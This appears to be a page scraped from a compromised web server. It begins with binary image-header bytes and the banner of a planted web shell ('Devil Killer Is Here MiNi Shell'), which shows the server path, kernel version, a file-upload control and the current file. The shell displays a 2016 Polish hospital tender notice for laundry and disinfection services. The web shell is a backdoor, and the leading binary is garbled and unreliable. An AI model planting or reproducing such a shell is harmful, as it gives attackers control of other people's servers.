JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160510/116006-N-2016.html

<p class="kh_header"><b>Wrocław: PN 39/16 - kompleksowa usługa prania i dezynfekcji oraz odbioru i dostawy bielizny szpitalnej, odzieży roboczej personelu, materacy, poduszek, kołder i koców</b><br>
<b>Numer ogłoszenia: 116006 - 2016; data zamieszczenia: 10.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. J. Gromkowskiego , ul. Koszarowa 5, 51-149 Wrocław, woj. dolnośląskie, tel. 071 3261325 w. 128, faks 071 3260622.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN 39/16 - kompleksowa usługa prania i dezynfekcji oraz odbioru i dostawy bielizny szpitalnej, odzieży roboczej personelu, materacy, poduszek, kołder i koców.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 4.1. Przedmiotem zamówienia jest świadczenie usług kompleksowego prania 
i dezynfekcji  oraz odbioru i dostawy bielizny szpitalnej oddziałów dziecięcych 
i dorosłych, odzieży roboczej personelu, materacy, poduszek, kołder i koców, będących własnością  Wojewódzkiego Szpitala Specjalistycznego im. J. Gromkowskiego z siedzibą we Wrocławiu przy ulicy Koszarowej 5, 51 - 149 Wrocław, zwanego dalej ZAMAWIAJĄCYM, w ilości i asortymencie przedstawionym w załączniku nr 1 do siwz - Formularz asortymentowo-cenowy. 
4.2. Usługa pralnicza obejmuje:
1) odbiór i transport bielizny szpitalnej brudnej i pozostałego asortymentu 
z magazynów bielizny Zamawiającego do pralni oraz transport i dostawa bielizny szpitalnej czystej i pozostałego asortymentu z pralni do magazynów bielizny Zamawiającego; transport zapewnia Wykonawca, na własny koszt i ryzyko; załadunek i rozładunek transportu bielizny brudnej i bielizny czystej oraz pozostałego asortymentu wraz z wniesieniem go do magazynów i należy do Wykonawcy,
2)  pranie, dezynfekcję chemiczno-termiczną,  suszenie, maglowanie, prasowanie, pakowanie, segregowanie, bieżącą reperację - serwis bieliźniarski: naprawa zamków błyskawicznych, nappów, zszywanie, cerowanie, przyszywanie guzików, troczków itp., bielizny szpitalnej oraz odzieży roboczej personelu,
3) pranie koców, pranie i dezynfekcję poduszek, kołder, materacy.
4.3. Realizacja usługi będzie wykonywana w ramach bieżących potrzeb Zamawiającego. Podana przez Zamawiającego ilość bielizny przeznaczonej do prania i dezynfekcji w czasie obowiązywania umowy jest wielkością szacunkową i może ulec zmniejszeniu lub zwiększeniu w zależności od faktycznych, bieżących potrzeb Zamawiającego. Wskazane wartości nie są wartościami stałymi i w tym zakresie Wykonawcy nie przysługuje roszczenie o zamówienie usługi u Wykonawcy 
w wartościach określonych w załączniku nr 1 do siwz. Wykonawcy nie przysługuje wynagrodzenie, ani żadne inne dodatkowe roszczenia za niewykorzystaną część umowy przez Zamawiającego. Wykonawcy przysługuje wyłącznie wynagrodzenie za faktycznie zrealizowaną część umowy w okresie jej obowiązywania.
4.4. Przed pierwszą dostawą Wykonawca na własny koszt zaopatrzy Zamawiającego w odpowiednią ilość:
1) worków do transportu brudnej bielizny, foliowych, przeźroczystych o odpowiedniej wytrzymałości niezbędnych do spakowania całości brudnej bielizny, samo-rozpuszczalnych koloru czerwonego dla segregacji, składowania i pakowania bielizny skażonej; w/w worki muszą posiadać atest Państwowego Zakładu Higieny.
Bielizna pościelowa skażona (zakaźnie lub zanieczyszczoną insektami), to bielizna pochodząca od chorych którzy są izolowani lub objęci nadzorem sanitarno-epidemiologicznym. 
Do tej grupy należy bielizna:
a) znacznie zanieczyszczona wydalinami i wydzielinami lub zanieczyszczona krwią,
b) pochodząca od chorych na świerzb i zawszawionych,
c) pochodząca od pacjentów izolowanych w ramach prewencji z powodu wystąpienia alertowego czynnika etiologicznego wieloopornego,
d) pochodząca z zaistniałego ogniska epidemiologicznego lub z innych szczególnych sytuacji interwencyjnych związanych z bezpieczeństwem epidemiologicznym - z polecenia zespołu kontroli zakażeń szpitalnych.
2) wózków transportowych do transportu bielizny (osiatkowane, wysokie) niezbędnych do transportu zadeklarowanej ilości bielizny brudnej i czystej oraz pozostałego asortymentu i stojaków na poszczególne oddziały dorosłych osobno na bieliznę czystą 
i na bieliznę brudną;
w.w. wózki i stojaki zostaną zwrócone Wykonawcy po zakończeniu trwania umowy. 
3) druków protokołów zdawczo-odbiorczych do pralni.

4.5. Odbiór, transport i dostarczenie przedmiotu zamówienia:
1) czas wykonania usługi pralniczej nie może przekroczyć 24 godzin od momentu 
odbioru asortymentu objętego przedmiotem zamówienia z magazynów bielizny brudnej Zamawiającego do czasu przekazania asortymentu objętego przedmiotem zamówienia 
do magazynów bielizny czystej, z wyłączeniem dni wolnych od pracy, za wyjątkiem materacy, koców, poduszek i kołder oraz wykonania usług naprawczych tzw. serwisu bieliźniarskiego dla których czas wykonania usługi nie może przekraczać 72 godzin. 
2)  dostarczanie bielizny czystej i asortymentu objętego przedmiotem zamówienia oraz wywożenie bielizny brudnej i asortymentu objętego przedmiotem zamówienia odbywać się będzie  w ciągu 24 godzin codziennie w dni robocze od poniedziałku do piątku do godziny 10:00.  Wykonawca zobowiązany jest do zapewnienia zapasu czystego asortymentu objętego przedmiotem zamówienia i dostarczenia go do magazynów bielizny Szpitala w razie zaistnienia takiej konieczności, w dni wolne od pracy. 
W szczególnych przypadkach, np.: dłuższy okres dni wolnych od pracy, czas wykonania usługi będzie ustalony indywidualnie za pisemną zgodą Zamawiającego. Dowodem odbioru bielizny brudnej do prania i dostawy czystej bielizny będzie każdorazowo protokół zdawczo -odbiorczy podpisany przez upoważnionych przedstawicieli Stron. Dowodem w zakresie uwag o jakości bielizny brudnej przyjętej do prania i jakości bielizny czystej odebranej po praniu będzie Protokół uwag zniszczenia bielizny  wg wzoru stanowiącego załącznik nr 9 do siwz podpisany przez upoważnionych przedstawicieli Stron. Wykonawca winien środkiem transportu dopuszczonym do transportu bielizny szpitalnej (posiadającym pozytywną opinię sanitarną na świadczenie usług transportowych w zakresie przedmiotu zamówienia), we własnym zakresie i na własny koszt dostarczać bezpośrednio do magazynów bielizny Zamawiającego bieliznę czystą i asortyment objęty przedmiotem zamówienia oraz odbierać bieliznę brudną i asortyment objęty przedmiotem zamówienia. 

4.6. Usługa prania: Wykonawca wykonywać będzie usługę spełniającą wymogi stosownych norm, ustaw i rozporządzeń, zwłaszcza resortu Ministerstwa Zdrowia, 
a w szczególności zgodnie z ustawą z dnia 05.12.2008r. o zapobieganiu oraz zwalczaniu zakażeń i chorób zakaźnych u ludzi (TJ Dz.U. z 2013r. poz. 947 
z późniejszymi zmianami) oraz Rozporządzenia Ministra Gospodarki z dnia 27.04.2000r. w sprawie bezpieczeństwa i higieny pracy w pralniach i farbiarniach (Dz.U. Nr 40,
poz. 469) oraz normą PN-EN 14065 Tekstylia. Tekstylia poddawane obróbce w pralni. System kontroli skażenia mikrobiologicznego. Wykonawca zobowiązany jest do stosowania zaleceń producentów bielizny i odzieży, zwłaszcza dotyczy to prania oraz dezynfekcji bielizny i odzieży roboczej personelu, skażonej oraz bielizny wysoko gabarytowej, np.: materace. Wykonawca zobowiązany jest do stosowania technologii prania gwarantującej wysoką jakość usługi oraz zapewniającej pełne przestrzeganie aktualnie obowiązujący przepisów sanitarno-epidemiologicznych, za co Wykonawca ponosi odpowiedzialność materialną i prawną wobec organów kontroli Państwowej Inspekcji Sanitarnej, Państwowej Inspekcji Pracy, BHP i innymi. Usługa musi być wykonywana zgodnie z zaleceniami Państwowego Inspektora Sanitarnego 
i Państwowego Zakładu Higieny. Zamawiający wymaga pozytywnej opinii Państwowego  Inspektora Sanitarnego w zakresie dopuszczenia pralni do świadczenia usług prania bielizny szpitalnej. Wykonawca gwarantuje wykonanie usług pralniczych 
w oparciu o środki piorące i dezynfekujące przeznaczone do higieny szpitalnej, które posiadają dopuszczenie PZH do użytku w jednostkach ochrony zdrowia oraz pozytywną opinię Instytutu Matki i Dziecka dopuszczającą preparat do prania bielizny z oddziałów dziecięcych. Wykonawca ponadto zobowiąże się do prania i dezynfekcji przedmiotu zamówienia przy użyciu metod i środków dostosowanych do asortymentu oraz zgodnych z wymogami technologicznymi w celu zapewnienia właściwej jakości prania nie powodującej zmiany jej wyglądu i przyspieszonego zużycia bielizny; 
w procesie prania i odplamiania nie będą stosowane środki agresywne, odbarwiające
i niszczące tkaniny (chlor i jego związki). Wykonawca stosuje środki piorące
i dezynfekcyjne oraz urządzenia i maszyny pralnicze niepowodujące przyspieszonego zużycia tkanin. 

4.7. Pozostałe wymagania:
1/ Wykonawca przynajmniej raz na kwartał przedstawi Zamawiającemu wyniki badań mikrobiologicznych wykonanych w pralni Wykonawcy  (na swój koszt) czystej bielizny - po jednej próbie ilościowej (metodą odciskową) oraz próbie jakościowej na MRSA 
i Clostridium difficle, dokumenty mają potwierdzać skuteczność prania i dezynfekcji przedmiotu zamówienia,potwierdzonych przez Państwowego Inspektora Sanitarnego, dokumentujących skuteczność prania i dezynfekcji. Zamawiający zastrzega sobie prawo pobierania prób czystościowych z dostarczonej wypranej bielizny, przez upoważnionego pracownika na koszt Wykonawcy, w przypadkach uzasadnionej potrzeby - np. kiedy dostarczona bielizna będzie widocznie splamiona czy niedoprana lub brudna oraz jeśli wyniki bakteriologiczne będą dodatnie,
2/ Wykonawca przynajmniej raz na 6 miesięcy przedstawi Zamawiającemu wyniki badania potwierdzającego czystość mikrobiologiczną komory dezynfekcyjnej,
3/ Wykonawca przynajmniej raz na 6 miesięcy przedstawi Zamawiającemu wynik badania potwierdzającego czystość mikrobiologiczną samochodu transportującego bieliznę czystą,
4/ Wykonawca udostępni Zamawiającemu (na żądanie) dokumentację warunków procesu prania i dezynfekcji, jakiemu podlegała dostarczona bielizna,
5/ Zamawiający zastrzega sobie możliwość kontroli warunków prania i transportu bielizny bez uprzedzenia Wykonawcy oraz wglądu do monitoringu czystości pralni 
i skuteczności działania komór dezynfekcyjnych,
6/ Wykonawca ponosi odpowiedzialność za rzeczy zgubione,
7/ Zamawiający ma prawo reklamować każdorazowo stwierdzenie niewłaściwej jakości wykonania usługi lub braki ilościowe, bezpośrednio po odbiorze upranego asortymentu objętego przedmiotem zamówienia, a Wykonawca powinien rozpatrzyć reklamację niezwłocznie, maksymalnie w ciągu 3 dni..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje  możliwość  udzielenia zamówień uzupełniających w zakresie nie większym niż 50% wartości zamówienia podstawowego, na zasadach określonych w art. 67 ust. 1 pkt 6 ustawy Pzp.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania -  zezwolenie Państwowej Inspekcji Sanitarnej na prowadzenie działalności objętej przedmiotem zamówienia -  ocena na podstawie załączonej kserokopii zezwolenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą, się wykonaniem lub wykonywaniem co najmniej dwóch usług odpowiadających swoim rodzajem, zakresem i wartością usługom stanowiącym przedmiot zamówienia, 
tj.: świadczenie  usług kompleksowego prania i dezynfekcji oraz odbioru i dostawy bielizny szpitalnej, odzieży roboczej personelu, materacy, poduszek, kołder i koców będących własnością Zamawiającego w okresie ostatnich trzech lat przed dniem wszczęcia postępowania, a jeżeli okres działalności jest krótszy - w tym okresie, o łącznej  wartości minimum: 250 000,00 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- Wykonawca musi dysponować obiektem pralni i posiadać aktualną pozytywną opinię sanitarną wydaną przez Państwowego Inspektora Sanitarnego o spełnianiu przez pralnię wymogów sanitarno-epidemiologicznych,
-Wykonawca usługi ma dostęp do narzędzi, wyposażenia zakładu 
i urządzeń technicznych, które umożliwiają zrealizowanie przedmiotu zamówienia,
- Wykonawca musi dysponować środkami transportu - co najmniej dwa samochody, przeznaczonymi do realizacji usługi, posiadającymi aktualną opinię sanitarną wydaną przez Państwowego Inspektora Sanitarnego. Opinia sanitarna powinna wskazywać 
czy środki transportu znajdują się pod nadzorem właściwego Państwowego Inspektora Sanitarnego, oraz stan środków transportu odpowiada warunkom sanitarno-higienicznym.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
tj.:
a) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 300 000,00 zł i posiadają ubezpieczenie od 
odpowiedzialności cywilnej z klauzulą szkód wyrządzonych w skutek przeniesienia 
HIV/chorób zakaźnych w wysokości minimum 200 000,00 zł. 
b) posiadają środki finansowe lub zdolność kredytową w wysokości co najmniej 
200 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
